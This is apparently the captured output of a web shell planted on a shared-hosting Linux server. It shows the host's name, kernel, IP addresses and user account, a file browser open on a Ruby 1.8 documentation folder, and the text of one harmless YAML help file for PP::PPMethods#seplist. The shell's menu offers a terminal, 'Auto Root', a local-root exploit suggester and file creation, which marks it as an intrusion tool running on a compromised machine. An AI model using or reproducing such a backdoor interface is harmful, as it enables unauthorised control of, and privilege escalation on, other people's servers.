Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.150
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
PP /
PPMethods /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-PPMethods.yaml
704
B
-rw-r--r--
2023-07-26 13:47
comma_breakable-i.yaml
343
B
-rw-r--r--
2023-07-26 13:47
guard_inspect_key-i.yaml
206
B
-rw-r--r--
2023-07-26 13:47
object_address_group-i.yaml
212
B
-rw-r--r--
2023-07-26 13:47
object_group-i.yaml
380
B
-rw-r--r--
2023-07-26 13:47
pp-i.yaml
462
B
-rw-r--r--
2023-07-26 13:47
pp_hash-i.yaml
178
B
-rw-r--r--
2023-07-26 13:47
pp_object-i.yaml
182
B
-rw-r--r--
2023-07-26 13:47
seplist-i.yaml
1.16
KB
-rw-r--r--
2023-07-26 13:47
Save
Rename
--- !ruby/object:RI::MethodDescription aliases: [] block_params: element comment: - !ruby/struct:SM::Flow::P body: Adds a separated list. The list is separated by comma with breakable space, by default. - !ruby/struct:SM::Flow::P body: "#seplist iterates the <tt>list</tt> using <tt>iter_method</tt>. It yields each object to the block given for #seplist. The procedure <tt>separator_proc</tt> is called between each yields." - !ruby/struct:SM::Flow::P body: If the iteration is zero times, <tt>separator_proc</tt> is not called at all. - !ruby/struct:SM::Flow::P body: If <tt>separator_proc</tt> is nil or not given, +lambda { comma_breakable }+ is used. If <tt>iter_method</tt> is not given, :each is used. - !ruby/struct:SM::Flow::P body: For example, following 3 code fragments has similar effect. - !ruby/struct:SM::Flow::VERB body: " q.seplist([1,2,3]) {|v| xxx v }\n\n q.seplist([1,2,3], lambda { comma_breakable }, :each) {|v| xxx v }\n\n xxx 1\n q.comma_breakable\n xxx 2\n q.comma_breakable\n xxx 3\n" full_name: PP::PPMethods#seplist is_singleton: false name: seplist params: (list, sep=nil, iter_method=:each) {|element| ...} visibility: public